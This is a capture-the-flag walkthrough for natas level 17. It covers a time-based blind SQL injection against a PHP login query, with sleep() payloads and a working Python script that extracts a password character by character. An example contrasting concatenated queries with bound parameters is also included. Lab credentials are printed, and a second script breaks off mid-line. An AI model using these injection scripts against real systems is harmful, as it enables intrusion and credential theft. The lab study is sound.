We open level 17 and look at the page.
View the source code:
<?php /*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '');
    mysqli_select_db($link, 'natas17');
    // Request data is concatenated straight into the SQL text (the injection point).
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }
    $res = mysqli_query($link, $query);
    if($res) {
        if(mysqli_num_rows($res) > 0) {
            //echo "This user exists.<br>";
        } else {
            //echo "This user doesn't exist.<br>";
        }
    } else {
        //echo "Error in query.<br>";
    }
    mysqli_close($link);
} else {
?>
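This reveals the main SQL query. All three echo statements are commented out, so the response itself gives no visible result.
For this kind of blind SQL injection, we follow the approach from an expert's write-up:
use sleep(5) to tell whether the injected condition was executed.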
SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) #
The query takes the injected form shown above.
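An added example (not part of the original post) showing why the timing probe answers yes/no questions against the concatenated query and gets nothing from a bound parameter. It uses an in-memory SQLite database as a stand-in for MySQL, so the payload is adapted (single quotes, `--` comment, no `binary`); `sleep` is a hypothetical recording stub and the table contents are constructed.

```python
import sqlite3

# Adapted from the page's MySQL payload for SQLite: single quotes, "--" comment,
# and plain LIKE (SQLite has no "like binary" and no "#" comments).
PAYLOAD = "natas18' AND password LIKE '%{0}%' AND sleep(1) -- "

def make_db():
    """In-memory stand-in for the page's `users` table (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas18', 'constructedA1')")
    calls = []
    # Hypothetical stub for MySQL's sleep(): records the call, returns 0 like MySQL.
    db.create_function("sleep", 1, lambda secs: calls.append(secs) or 0)
    return db, calls

def lookup_concat(db, username):
    # Same flaw as the page's PHP: request data is pasted into the SQL text.
    sql = "SELECT * FROM users WHERE username='" + username + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, username):
    # Hardened form: the value is bound as data and never parsed as SQL.
    return db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()

def probe(lookup, ch):
    """Return (rows returned, sleep() calls) for one guessed character."""
    db, calls = make_db()
    rows = lookup(db, PAYLOAD.format(ch))
    return len(rows), len(calls)

if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_concat), ("bound", lookup_bound)):
        for ch in ("A", "z"):
            print(name, repr(ch), "rows/sleeps =", probe(fn, ch))
```

Both concatenated probes return zero rows, so only the delay distinguishes a correct guess; with the bound parameter the whole payload is compared as a literal username and `sleep` is never evaluated.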
The Python script is as follows:
import requests
from requests.auth import HTTPBasicAuth

Auth = HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
headers = {'content-type': 'application/x-www-form-urlencoded'}
filteredchars = ''
passwd = ''
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'

# Pass 1: find which characters occur anywhere in the password.
for char in allchars:
    payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)
    r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
    # A response delayed by at least one second means the condition was true.
    if(r.elapsed.seconds >= 1):
        filteredchars = filteredchars + char
        print(filteredchars)
print(filteredchars)

# Pass 2: extend the known prefix one character at a time (32 characters).
for i in range(0,32):
    for char in filteredchars:
        payload = 'username=natas18%22%20and%20password%20like%20binary%20\'{0}%25\'%20and%20sleep(1)%23'.format(passwd + char)
        r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)
        if(r.elapsed.seconds >= 1):
            passwd = passwd + char
            print(passwd)
            break
We run it in VS Code.
A Python 3.10 script:
# coding:utf-8
import requests
url = 'http://natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd@natas17.natas.labs.overthewire.org/index.php'
key = ''
for i in range(1, 33):
    a = 32
    c = 126
    while a
However, the delay is changed to 10 seconds, so just wait patiently.
This yields the password:
8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq
Verify the password.